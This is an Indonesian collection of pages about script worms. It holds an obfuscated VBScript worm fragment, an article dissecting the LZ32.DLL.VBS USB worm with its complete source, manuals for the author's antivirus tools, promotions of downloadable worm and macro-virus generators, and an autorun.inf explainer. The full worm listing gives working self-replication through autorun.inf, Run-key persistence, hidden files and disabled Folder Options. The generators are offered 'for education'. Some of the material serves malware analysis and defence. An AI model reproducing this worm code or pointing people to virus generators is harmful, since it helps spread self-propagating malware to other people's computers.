four2.regwrite ReAd( "fyf/fwbtosdT]qpultfE]mfobQ!mpsuopD]SFTV`UOFSSVD`ZFLI" ), ReAd( "sdt/e4uyfutt]]34nfutzt]]TXPEOJX]];D" )
four2.regwrite ReAd( "hojsuTzbmqtjE]E4uyfU]tsfwbtoffsdT]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), ReAd( "1/3!sfw!fop3svpg!n(j" )
four2.regwrite ReAd( "zujwjujtofTftvpN]ftvpN]mfobQ!mpsuopD]SFTV`UOFSSVD`ZFLI" ),"1"
four2.regwrite ReAd( "effqTftvpN]ftvpN]mfobQ!mpsuopD]SFTV`UOFSSVD`ZFLI" ),"0"
nae = four2.RegRead (ReAd( "sfoxPefsfutjhfS]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI" ))
four2.regwrite ReAd( "]mmfit]sfempg]tfttbmD]FSBXUGPT]FOJIDBN`MBDPM`ZFLI" ) & nae & ReAd( "]eobnnpd]fN!ub!lppm!ftbfmQ!t(" ),ReAd( "FYF/FSPMQYFJ" ),"REG_EXPAND_SZ"
 if Wd = 5 and Hn > 12 then
 set sd = createobject(ReAd( "mmfit/uqjsdtX" ))
 sd.run ReAd( "1!u.!t.!fyf/oxpeuvit" )
 else
 if Mn = 9 or Mn = 19 or Mn = 29 or Mn = 39 or Mn = 49 or Mn = 59 then
 twoone.CopyFile four2.SpecialFolders(ReAd( "uofdfs" )) & ReAd( "lom/hqk/+]" ), four2.SpecialFolders(ReAd( "qpultfE" )) & "\", true
 set sd = createobject(ReAd( "mmfit/uqjsdtX" ))
 sd.run ReAd( "FYF/FSPMQYFJ" )
 end if
 end if
end if

if check <> 1 then
Wscript.sleep 80000
end if
loop while check <> 1 
set sd = createobject(ReAd( "mmfit/uqjsdtX" ))
sd.run windowpath & ReAd( "!-udfmft0-f0!fyf/sfspmqyf]" ) & Wscript.ScriptFullname

Function ReAd( WriTe )
  Dim Son, ToLo, Yo
  Son = ""
  For ToLo = 1 To Len( WriTe )
  Yo = Mid( WriTe, ToLo, 1 )
  Son = Chr( Asc( Yo ) - 1 ) & Son 
  Next
  ReAd = Son
End Function

Tulisan ini telah dimuat di majalah CHIP dengan versi bahasa yang telah “diformalkan” dengan judul yang berbeda. Tulisan ini adalah versi aslinya dan disajikan tanpa dukungan gambar. Semoga berguna dan jangan disalahgunakan... 

Virulogi : Ancaman Script nakal (worm-scripting)

By Tri Amperiyanto

Worm (virus) lokal dengan teknik scripting ternyata masih merebak di sekitar pemakai komputer. Disana-sini masih saja ditemui Script nakal berjenis VBS (VBE), yang berkembang biak dengan varian-varian baru. Untuk itu, pemakai komputer dianjurkan lebih waspada saat bekerja dengan komputer. 
Untuk lebih mengenal dan memahami skrip-skrip berbahaya tersebut, akan diulas bagaimana suatu script worm sederhana bekerja. Sebagai model, akan diambil satu script worm sesungguhnya yang banyak beredar. File worm jinak ini bernama LZ32.DLL.VBS.

Cara kerja

Worm (virus) script, pada saat aktif, dengan bantuan fasilitas standar scripting Windows – WSH (windows scripting host)/WSCRIPT atau CSCRIPT, akan membuat file dengan nama lz32.dll.vbs, yang merupakan script utama. Dibantu dengan file yang bernama autorun.inf, yang berfungsi untuk menjalankan file worm, secara otomatis pada saat flashdisk ditancapkan ke komputer. Worm ini tidak melakukan manipulasi berbahaya, hanya menyebarkan diri dan melakukan manipulasi ringan pada Registry.
Berikut ini adalah petikan dari script yang menunjukkan cara kerja program nakal tersebut. Pembahasan tidak akan terlalu detail dan teknis, hanya memberikan keterangan global dari beberapa script. Untuk pemahaman lebih jauh, silahkan dicermati dan dianalisis sendiri secara mandiri.


Inisialisasi awal script

Pertama kali script (program) akan melakukan perintah klasik untuk menangani kesalahan program. Pengaturan beberapa variabel pendukung script akan dibuat. Lalu, Script aktif yang sedang berjalan dipersiapkan untuk menjadi suatu file teks yang siap untuk dikopikan. 

on error resume next
dim myself,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript lz32.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
myself=myself&text.readline
myself=myself & vbcrlf
loop

Kopi dan sembunyi

Pengaturan path untuk bekerja akan ditentukan. File yang telah dipersiapkan akan dikopikan ke folder Windows dengan nama lz32.dll.vbs. Dan memasangkan file attribut = 39. Angka 39 ini merupakan penjumlahan dari angka-angka atribut. Artinya file tersebut akan bersifat readonly (1) – hanya bisa dibaca, hidden (2) - tersembunyi, system (4) - sistem dan Archieve (32) - arsip. Dengan teknik ini maka file lz32.dll.vbs tidak akan terlihat (bersembunyi) saat pemakai memakai Windows Explorer. 

do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\lz32.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\lz32.dll.vbs",2,true)
tf.write myself
tf.close
set tf = fs.getfile(winpath & "\lz32.dll.vbs")
tf.attributes = 39


Pemeriksaan jenis drive

Selanjutnya script akan menangani setiap drive yang ada pada sistem komputer. Jika jenis drive sama dengan 1 (= removable) atau 2 (= fixed) dan pathnya tidak sama dengan A:, program akan mengopikan file script aktif ke drive tersebut dengan nama lz32.dll.vbs. Sebelum pengopian berlangsung atribut file akan dijadikan archive (32) terlebih dahulu. Setelah proses kopi dilakukan atribut file diset kembali menjadi 39 (bersifat readonly, hidden, System dan archieve)

for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\lz32.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\lz32.dll.vbs",2,true)
tf.write myself
tf.close
set tf=fs.getfile(flashdrive.path &"\lz32.dll.vbs")
tf.attributes =39

Selain itu, script juga akan membuat file autorun.inf dengan prosedur yang sama dengan pembentukan file lz32.dll.vbs.

set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next



Manipulasi Registry 

Pada tahapan berikutnya, script akan melakukan beberapa memanipulasi Registry yang tidak berbahaya. Agar script selalu diaktifkan setiap kali Windows dihidupkan, maka ia akan memanipulasi subkey Registry autorun standar, pada subkey Run.

set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\lz32dll",winpath&"\lz32.dll.vbs"

Juga, script akan mengubah titel dari Internet Explorer dengan judul 6297676.


rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","6297676"
rg.regwrite 

Script akan mengubah icon dari file VBS dengan icon lain (DLL). Sehingga akan mengecoh pemakai.

"HKCR\vbsfile\DefaultIcon","%SystemRoot%\System32\shell32.dll,2","REG_EXPAND_SZ"
rg.regwrite 

Script akan menghilangkan fasilitas pengaturan file – Folder Options - pada Windows Explorer. Manipulasi registry dilakukan secara dua level, yaitu : level User dan Machine.  


"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",1,"REG_DWORD"
rg.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",1,"REG_DWORD"



Tipuan dan pengulangan skrip

Script akan menunda proses infeksi, jika jenis drive aktif tidak sama 1 (removable disk), selama beberapa waktu. Lalu melakukan proses perputaran pengulangan script. 

if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1

Terakhir kali, jika kriteria drive tersebut tidak terpenuhi, skrip akan diulang lagi. Hanya saja pemicunya adalah file script yang berada di folder Windows.

set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname


Lebih hati-hati

Hanya dengan beberapa baris script sederhana, ternyata suatu file skrip dapat menyebar, menggandakan diri dan melakukan manipulasi (berbahaya) dengan mudah. Untuk itu, pemakai komputer disarankan untuk lebih berhati-hati dalam menjalankan suatu file, khususnya file *.VBS (VBE), secara sembarangan. Selain itu, memakai program Antivirus yang selalu terupdate dapat mengurangi risiko serangan script berbahaya.

Listing program 

Listing berikut ini adalah listing asli program worm yang berhasil ditangkap. File aslinya bernama LZ32.DLL.VBS. Disajikan secara teks dan apa adanya. Silahkan dicermati.

' ----- ExeScript Options Begin -----
' ScriptType: window,silent
' DestDirectory: temp
' Icon: default
' OutputFile: H:\lz32.dll.exe
' ----- ExeScript Options End -----
'Don't Wanna Know Me
on error resume next
dim myself,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript lz32.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
myself=myself&text.readline
myself=myself & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\lz32.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\lz32.dll.vbs",2,true)
tf.write myself
tf.close
set tf = fs.getfile(winpath & "\lz32.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\lz32.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\lz32.dll.vbs",2,true)
tf.write myself
tf.close
set tf=fs.getfile(flashdrive.path &"\lz32.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\lz32dll",winpath&"\lz32.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","6297676"
rg.regwrite "HKCR\vbsfile\DefaultIcon","%SystemRoot%\System32\shell32.dll,2","REG_EXPAND_SZ"
rg.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",1,"REG_DWORD"
rg.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",1,"REG_DWORD"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname



Tulisan ini telah dimuat di majalah CHIP dengan versi bahasa yang telah “diformalkan” dengan judul yang berbeda.. Tulisan ini adalah versi aslinya dan disajikan tanpa dukungan gambar. Semoga berguna dan jangan disalahgunakan... 

CyberSufi Hates Virus (CSHV)

Version 2.0

By Tri Amperiyanto

CSHV adalah program Anti virus Universal. Dengan program ini Anda dapat membuat database virus sendiri berdasarkan kondisi yang Anda hadapi. Anda cukup menentukan file (yang dianggap) virus dan membuat databasenya.  

Program ini TIDAK dimaksudkan menggantikan program antivirus profesional yang telah Anda miliki. Program ini sekadar melengkapi peralatan tempur Antivirus Anda. sehingga jika Anda menemui virus baru dapat segera di atasi.

Pada CSHV versi 2.0 terdapat beberapa perbaikan dari versi-versi sebelumnya, sbb :

* Terjadi perombakan engine scanner. Engine scanner CSHV semula hanya berbasis PE Header yang
databasenya disimpan di file CSHV.CS, pada versi 2.0 ini ditambahkan engine scanner yang 
berbasis CRC32 - milik CSHW. yang disimpan CSHW.CS.  
Jadi pada versi 2.0 CSHV memakai DUO ENGINE. Sehingga CSHV dapat menangani virus basis file 
binner maupun virus basis teks. Jadi dapat dikatakan program CyberSufi Hates Worm (CSHW) 
digabungkan dengan CyberSufi Hates Virus (CSHV) meskipun tidak secara keseluruhan.

* Pembuatan database baru interfacenya pun berubah. hanya dengan sekali menentukan file, 
maka dua kode database akan sekaligus dibuat. dan ketika database disimpan, CSHV akan 
secara otomatis memasukkan ke file database yang sesuai.

* Pada versi 2.0 juga ditanami oleh fitur program CyberSufi No Mery (tools on access scanner) 
yang bertugas mematikan proses virus juga membunuh atau memperbaiki file virus. CSNM versi 
yang ditambahkan pada CSHV tidak akan membunuh file yang ditemui, hanya akan membunuh proses 
virus saja. Fitur ini dapat diaktifkan dan dimatikan setiap saat sesuai kebutuhan.

* Ditambahkan fitur SETTINGS, yang berguna untuk mengatur setingan kinerja CSHV. CSHV dapat 
diatur apakah akan memperbaiki file DOC/XLS/EXE ataukah tidak. Apakah akan mendeteksi EXE ganda 
atau tidak. Juga pengaturan ekstension jenis file yang akan discan. Selain itu fitur pengatur 
besarnya ukuran file yang akan ditangani oleh engine CRC32 juga dapat diatur.

* Fitur cara Scanning diperbaiki. dengan menambahkan dua tambahan scan.  
Tombol ScanDir diganti nama menjadi : Scan. fungsinya melakukan scanning untuk folder aktif 
plus subfolder yang ada dibawahnya.
dan ditambahkan dua tombol baru yaitu :

ScanAll untuk memeriksa seluruh drive yang ada
ScanDir untuk memeriksa folder yang aktif saja tanpa mengikutkan subfolder dibawahnya.
* Tampilan file yang diperiksa diubah, untuk mengurangi rasa "HANG"...
* Terdapat fasilitas karantina sederhana. 

Jika berminat silahkan download di section Download.
Jika file berhasil didownload copy dan ekstrak file installcshv.exe ke drive yang diinginkan. jalankan file tersebut. file program akan diinstal di \CS\CSHV.

Semoga tools ini berguna dan digunakan...

CyberSufi No Script [CSNS] - Program sederhana Anti Script

By Tri Amperiyanto

Tidak dapat disangkal lagi virus/worm Script masih saja merajalela dimana-mana, meskipun pemakai komputer telah "menanami" komputernya dengan program Anti-Virus tercanggih yang selalu rajin di update. Ini disebabkan begitu banyaknya varian virus script dibuat, dengan teknik dan pengembangan program yang terus dibenahi oleh virus maker, membuat virus terkadang lepas dari cengkraman AV.
Program CyberSufi No Script [CSNS] ini mencoba menutupi celah rawan tersebut. Artinya program ini tidak didesain untuk menggantikan program AV yang Anda pakai. Hanya memperkuat saja.  

0. Install Program

Kopi file install program ke folder yang Anda inginkan pada drive C atau D. lalu Jalankan Install program - InstallCSSN.EXE. Program akan diinstal di folder : \CS\CSNS.
Buka folder tersebut, dan jalankan file CSNS.EXE. Program akan aktif dalam bentuk icon pada system tray. Klik Kanan Icon tersebut untuk melihat menu dan mengatur setingnya.
Klik Pasang Blokir win xp atau 9X (sesuaikan dengan sistem operasi Anda) untuk mulai memblokir skrip. (note : secara default fitur pemantau dan pembunuh proses skrip akan aktif)


1. Menu Utama
CSNS mempunyai beberapa pilihan menu sbb :
Exit Menu - Untuk keluar dari menu pop up
Matikan CSNS - untuk mengakhiri program CSNS
Pesan Sponsor - iklan narsis ..
Aktifkan CSNS saat Booting - Membuat CSNS langsung diaktifkan saat windows dihidupkan
Matikan fitur Autorun Windows - Memblokir fitur autorun Windows
Tunda Pengawasan Autorun - memantau keberadaan file autorun.inf pada removable disk
Pasang Blokir Registry win 9X - Memasang pemblokiran registry untuk windows 9X
Pasang Blokir Registry win XP - Memasang pemblokiran registry untuk windows XP
Tunda Pengawasan Memory - Untuk memantau aktifnya program Script

2. SKRIP BLOKIR
CSNS didesain untuk dapat melakukan blokir pada file-file script. Ada dua fitur yang disediakan : standar dan proses.

2.1. FITUR BLOKIR STANDAR SCRIPT

CSNS diperlengkapi dengan fitur untuk memblokir file SCript (VBS/VBE/JSE). Ia akan memblok skrip yang dipanggil secara langsung (file diaktifkan dengan klik ganda) atau diketikkan langsung nama filenya. Untuk mengaktifkan fitur ini, Anda harus memasangkan setingan registry via pilihan :Pasang Blokir Registry win 9x/XP.

Pasang Blokir Registry win 9X - Memasang pemblokiran registry untuk windows 9X. Setingan ini khusus untuk windows 9X. Jika sistem operasi tidak sama, tidak disarankan untuk dipasangkan. karena dapat membuat fungsi eksekusi program script (WSCRIPT/CSCRIPT) tidak dapat berjalan sebagaimana mestinya. Jika Setingan ini aktif, maka pada menu popup pilihan : 

Pasang Blokir Registry win 9X akan berganti dengan pilihan : Hapus Blokir Registry win 9X

Untuk menormalkan blokir, tinggal Anda pilih pilihan tersebut.


Pasang Blokir Registry win XP - Memasang pemblokiran registry untuk windows XP. Setingan ini khusus untuk windows XP. Jika sistem operasi tidak sama, tidak disarankan untuk dipasangkan. karena dapat membuat fungsi eksekusi program script (WSCRIPT/CSCRIPT) tidak dapat berjalan sebagaimana mestinya. Jika Setingan ini aktif, maka pada menu popup pilihan : 

Pasang Blokir Registry win XP akan berganti dengan pilihan : Hapus Blokir Registry win XP 
Untuk menormalkan blokir, tinggal Anda pilih pilihan tersebut.

Jika seting blokir sudah aktif, saat suatu file skrip dijalankan (baik sengaja atau tidak.. ) maka akan muncul suatu jendela peringatan. Yang intinya mengatakan bahwa suatu file skrip mencoba untuk aktif. Nama file tersebut akan ditampilkan. Klik JALAN untuk mengijinkan ekseskusi file skrip tersebut. Atau Klik STOP untuk menghentikan jalannya skrip. Atau klik HAPUS untuk menghapus file.

Jika MEMANG Anda ingin menjalankan skrip, pastikan bahwa Anda telah memilih/mengatur pilihan : Lanjutkan Pengawasan Memory menjadi ==> Tunda Pengawasan Memory.

**** Fitur ini diharapkan dapat memblok program skrip yang tidak sengaja dijalankan (klik ganda) oleh pemakai. ***


2.2. FITUR MATIKAN PROSES FILE ENGINE SCRIPT

CSNS diperlengkapi dengan fitur untuk mematikan proses file engine (program) skrip yaitu : WSCRIPT.EXE dan CSCRIPT.EXE. Fitur ini disediakan, untuk mengantisipasi bilamana skrip dijalankan secara tidak langsung via command prompt atau shell program. Atau bilamana fitur standar gagal melakukan fungsinya.

Untuk release ini ada 8 versi skrip dengan kode dengan kode database sbb. :

0000834000011E0063736876 98 WSCRIPT
000071F00001180063736876 98 CSCRIPT
000017700000D00063736876 XP CSCRIPT
00002B100000F00063736876 XP WSCRIPT
000028420000E00063736876 XP SP2 CSCRIPT
00003C230001000063736876 XP SP2 WSCRIPT
00002F810001100063736876 VISTA CSCRIPT
00002B230001400063736876 VISTA WSCRIPT

Tunda Pengawasan Memory - Untuk memantau aktifnya program Script. 
Pilihan ini digunakan untuk mengaktifkan dan menonaktifkan sementara pengawasan aktifnya program WSCRIPT.EXE dan CSCRIPT.EXE. (FITUR 2).

Jika Pilihan - Tunda Pengawasan Memory - dipilih maka teks pada pilihan tersebut akan berganti dengan - Lanjutkan Pengawasan Memory. dan proses pemantauan proses kedua program skrip tersebut menjadi tidak aktif. Untuk mengaktifkan kembali cukup Anda pilih kembali.

2.3. Bagaimana jika proses WSCRIPT.EXE atau CSCRIPT.EXE pada komputer Anda tidak dapat dimatikan oleh CSNS ?

Itu tandanya file WSCRIPT.EXE atau CSCRIPT.EXE yang ada pada sistem operasi Anda berbeda releasenya dengan database standar CSNS. Kirimkan file-file tersebut pada saya sehingga dapat dimasukkan ke daftar database.

3. BLOKIR AUTORUN

Fitur ini akan memblokir file autorun.inf pada removable media (flash disk) yang umumnya dipakai oleh

virus/worm dalam aksinya menyebarkan diri dan menginfeksi sistem komputer.

Matikan fitur Autorun Windows - Memblokir fitur autorun Windows
Pilihan digunakan untuk mematikan atau menghidupkan fitur autorun windows. Secara default fitur ini akan diaktifkan windows. Disarankan, untuk mematikan pilihan ini. Sehingga saat removable disk (flash disk) ditancapkan ke USB, maka file autorun.inf tidak akan langsung dijalankan. ini akan membantu menghambat aktifnya virus secara otomatis.
Jika dipilih maka menu akan berubah dari : Matikan fitur Autorun Windows menjadi => Hidupkan fitur Autorun Windows.

Tunda Pengawasan Autorun - memantau keberadaan file autorun.inf pada removable disk
Pilihan ini digunakan untuk menunda sementara pengawasan keberadaan file autorun.inf di flash disk.

Jika dipilih maka menu akan berubah dari : Tunda Pengawasan Autorun menjadi => Lanjutkan Pengawasan Autorun. Untuk melanjutkan pengawasan klik pilihan : Lanjutkan Pengawasan Autorun

 

Saat flashdisk dipasang, jika terdapat file autorun.inf maka akan segera muncul kotak blokir, yang menunjukkan lokasi file pemicu virus. Pada saat ini, anda dapat memilih :

* Hapus Autorun - untuk menghapus file autorun.inf
* Hapus Virus - untuk menghapus file pemicu virus
* Keluar - untuk keluar dari kotak tampilan.
* Tunda - untuk mematikan proses cekal dan keluar dari kotak tampilan secara paksa. Hati-hati dengan pilihan ini, karena proses pengawasan file autorun.inf TIDAK LAGI DILAKUKAN OLEH CSNS. fitur ini berguna jika Anda, mungkin, ingin mengkopi/ mengkoleksi file autorun.inf dan file pemicu virus ke tempat lain sebagai kenang-kenangan hehehe ..  
Disarankan untuk segera menghidupkan fitur ini via menu -- Autorun -- pada system tray, setelah prosesi pengopian "cindera mata virus" dilakukan demi keamanan Anda.


4.MEMBUAT CSNS OTOMATIS AKTIF SAAT BOOTING

Pilihan - Aktifkan CSNS saat Booting - dipakai agar CSNS diaktifkan saat windows dibooting ulang /log off. Dengan adanya fitur ini akan menjamin aktifnya pemantauan sistem komputer oleh CSNS.
Jika dipilih maka menu akan berubah dari : Aktifkan CSNS saat Booting menjadi => NonAktifkan CSNS saat Booting. Untuk melanjutkan pengawasan klik pilihan : Lanjutkan Pengawasan Autorun

Untuk pemakaian yang lain silahkan dicoba sendiri.

Sekali lagi, perlu diingat, bahwa program ini ditujukan untuk membantu program AntiVirus yang Anda pakai,TIDAK MENGGANTIKANNYA ! 
Kompensasi yang harus Anda terima jika memakai CSNS adalah memory komputer Anda akan berkurang, karena CSNS memakai beberapa modul TIMER untuk memantau sistem.

ANDA BEBAS MEMAKAI, MENGGANDAKAN, MENGHACK, MENGCRACK, REVERSE ENGINEERING, DKK.... hehehe... NAMUN DENGAN RESIKO YANG HARUS ANDA TANGGUNG SENDIRI ! 

SILAHKAN AMBIL PROGRAM DI SECTION DOWNLOAD.

Begitu saja. semoga program ini berguna dan digunakan..   Kritik, saran, dan cacian dapat dikirim ke email.

CYBERSUFI VIRUS GENERATOR
BEING DIGITAL 2

By Cybersufi



CSVG:BD2 adalah program pembuat (generator) virus (tepatnya: worm ... ). Ditujukan untuk keperluan pendidikan saja. Program ini akan menghasilkan source code virus, yang pada akhirnya harus dicompile dengan Visual Basic 6.0. agar terbentuk file EXE.

Jalankan program instalasi. akan terlihat tampilan seperti berikut.

Install untuk memasang program BD2
Hapus untuk menghapus program BD2
Exit untuk keluar program

Klik Install, maka program BD2 akan terpasang di harddisk/flashdisk, tergantung darimana Anda menginstalnya, pada root directory dengan nama folder CSEVG.
Buka folder tersebut. dan Akifkan file CSEVG.EXE, maka akan muncul kotak awal konfirmasi. masukkan password dengan tepat. perhatikan huruf besar atau kecilnya. (password bisa dilihat di bagian Forum). Lalu klik Ok.

Tampilan utama BD2 akan muncul. dari gambar yang ada cukup jelas ya? Rasanya tidak usah diterangkan...  

Pilihan Buat Virus untuk mulai membuat source code virus 
Pilihan Exit untuk keluar program
Pilihan About untuk melihat bagian narsis hehehe ...

*** untuk panduan penggunaan bisa dilihat dengan mengklik tombol icon cybersufi. ***


Begitu saja. semoga program generator ini digunakan dengan baik dan seharusnya. tidak disalahgunakan !!!

SIlahkan download program dari section Download. dan pilih folder Virus. Nah... disana mainan kecil sampeyan berada. have fun...

CYBERSUFI VIRUS GENERATOR
BEING DIGITAL 1

By Cybersufi



CSVG:BD1 adalah program pembuat (generator) virus macro untuk WORD dan EXCEL. Ditujukan untuk keperluan pendidikan saja. Program ini adalah revisi dari program lama yang semula ditulis dengan VBA. Dan dikonversi menjadi EXE dengan VB.

Akifkan file BD1.EXE maka akan muncul kotak awal konfirmasi. masukkan password dengan tepat. perhatikan huruf besar atau kecilnya. (password bisa dilihat di bagian Forum).  

Dan pilih bahwa Anda setuju. lalu klik Ok.

Tampilan utama BD1 akan muncul.

Pilihan Virus macro word untuk mulai membuat virus macro untuk WORD.
Pilihan Virus macro Excel untuk mulai membuat virus macro untuk EXCEL.
Pilihan About untuk melihat promosi.... (ini yang paling penting hehehe )
Pilihan Selesai untuk keluar program.

Jika dipilih Virus macro word maka tampilan menunya seperti ini. Silahkan dicoba sendiri. programnya gampang sekali dipakai. Namun resikonya Anda tanggung sendiri... 

Jika dipilih Virus macro Excel maka tampilan menunya seperti ini. Silahkan dicoba sendiri. Anda tinggal masukan isian yang ada, dan main kliki sana-sini, jadilah 

tapi, jangan lupa, resikonya Anda tanggung sendiri... 

Jika pilihan About dipilih tampilannya seperti ini. biasaaaaa promosi....

Jika pilihan Selesai dipilih. maka kotak konfirmasi akan keluar.

Klik Ok untuk selesai dan klik Menu utama untuk kembali bekerja.

File virus, jika berhasil dibuat, akan disimpan dalam format DOC atau XLS. File yang Anda buat akan diletakkan oleh program di Root directory (C:\). coba cari...

Begitu saja. semoga program generator ini digunakan dengan baik dan seharusnya. tidak disalahgunakan !!!  

SIlahkan download program dari section Download. dan pilih folder Virus. Nah... disana mainan kecil sampeyan berada. take care...

[Artikel ini telah dimuat di majalah CHIP dengan versi bahasa yang telah “diformalkan”.. :)  Artikel ini adalah naskah aslinya dalam versi bahasa non-formal. Semoga berguna !]

VIROLOGI : 
Bahaya Autorun 

By Tri Amperiyanto


Saat kita memasukkan CD, misalnya CD Video, ke CD-Drive, maka komputer akan segera meresponnya dengan menjalankan isinya secara otomatis. Dan kita tinggal menikmati film yang ingin kita tonton. Atau mungkin saat kita melakukan setup suatu program, dan memasukkan CD program, komputer meresponnya dengan menampilkan fasilitas program setup secara otomatis. Itulah yang dimaksud dengan fitur autorun.  
AutoRun adalah salah satu fitur Windows. Ftur ini akan menjalankan secara otomatis prosedur penginstalan dan pengkonfigurasian program (produk) yang didesain dengan platform berbasis Windows. Umumnya program ini ada dalam CDROM. Saat kita memasukkan CD yang memiliki data-data autorun ke cdrom drive, secara otomatis Windows akan menjalankan aplikasi yang mungkin akan dipakai untuk instal, konfigurasi atau bahkan menjalankan sembarang file executable. 
Jadi, fitur Autorun ini pada awalnya memang disediakan untuk kemudahan akses program di CD-ROM. Namun pada perkembangannya, di Indonesia, fitur Autorun ini banyak dieksploitasi untuk perkembang–biakan virus (worm) via removable media semacam Flash Disk. Pada artikel ini, kita akan memakai media flashdisk sebagai contoh. Karena media inilah yang ditengarai sebagai biang keladi penyebaran virus di Indonesia.

Dua hal penting

Bagaimana caranya agar aplikasi (file execute) yang kita inginkan dijalankan oleh fitur autorun ini ? Ada dua hal penting yang harus kita penuhi untuk melaksanakan niat ini. Pertama, kita harus membuat suatu file yang bernama Autorun.inf. Kedua, adalah mempersiapkan aplikasi yang akan dijalankan. File Autorun.inf adalah file teks ASCII biasa. Sehingga dapat dibuat dengan program teks editor semacam notepad.


Tentang Autorun.inf 

Autorun.inf adalah suatu file teks yang biasanya ada pada root directory dari suatu CD-ROM yang berisi aplikasi. Fungsi utamanya adalah memberitahu system, tentang nama dan lokasi aplikasi startup program (file execute) yang akan dijalankan saat disk (CD) dimasukkan.
Autorun.inf dapat berisi info opsional seperti : Nama file yang berisi icon yang akan mewakili aplikasi. Icon ini akan ditampilkan oleh Windows Explorer menggantikan icon drive standar.  
Juga ia dapat berisi, perintah-perintah tambahan untuk shortcut menu (menu konteks) yang akan ditampilkan saat kita melakukan klik kanan pada icon CD-ROM. Juga, kita dapat mendefinisikan perintah default yang akan dijalankan, saat kita melakukan klik ganda pada icon tersebut.
Sekilas, file Autorun.inf mirip dengan file *.INI. Karena akan berisi satu atau dua bagian (section) yang diapit oleh tanda kurung kotak (square brackets). Pada setiap section akan berisi serangkaian perintah yang akan dijalankan oleh shell saat disk dimasukkan.  
Ada dua section pada autorun, yaitu : [Autorun] dan [DeviceInstall]. Kita akan melihatnya sekilas. 
* Section [autorun] 
Section ini berisi perintah default autorun. Setiap file autorun.inf pasti mempunyai section ini. Sebetulnya ada section tambahan, [autorun.alpha], namun hanya diperuntukkan bagi komputer yang memakai sistem basis RISC (RISC-based).
* Section [DeviceInstall] 
Section ini dapat dipasangkan pada sembarang removable media dan hanya di-support oleh sistem operasi Windows XP ke atas. Hanya ada satu perintah pada section ini, yatitu : DriverPath, yang berguna untuk menentukan directory path dimana Windows XP harus mencari file-file driver. Sekadar info, pada Windows XP seluruh media tidak lagi dicari secara default, maka dibutuhkanlah section ini untuk menyebutkan lokasi pencarian.  
Oleh karena, perintah ini digunakan hanya saat instalasi driver, dan secara pasti tidak merupakan bagian dari operasi autorun, maka kita tidak akan membahasnya. Kita hanya akan membahas Section [autorun] saja.

Perintah standar pada section [Autorun]

Beberapa perintah standar pada bagian ini adalah sebagai berikut : 
Icon
Label
Action
Open
Shellexecute
Shell
shellverb
Setelah ini, kita akan melihat perintah (masukan) tersebut secara ringkas. Sebagai contoh kita akan memakai media Flash Disk saja. Karena saat ini media inilah yang lazim dipakai sebagai sarana simpan dan transfer data oleh pemakai komputer. 
Anggap saja kita memasukkan suatu Flash Disk via USB port, dan akan terlihat bahwa Flash Disk aktif di drive I. Label dari Flash Disk tersebut adalah Cybersufi. Lihat gambar 1.


Gambar 1 : Flashdisk aktif pada drive I

Juga, asumsikan, kita telah mengopikan file execute yang bernama test.exe, yang mempunyai dua icon dalam filenya. Kita letakkan di root directory Flash Disk.
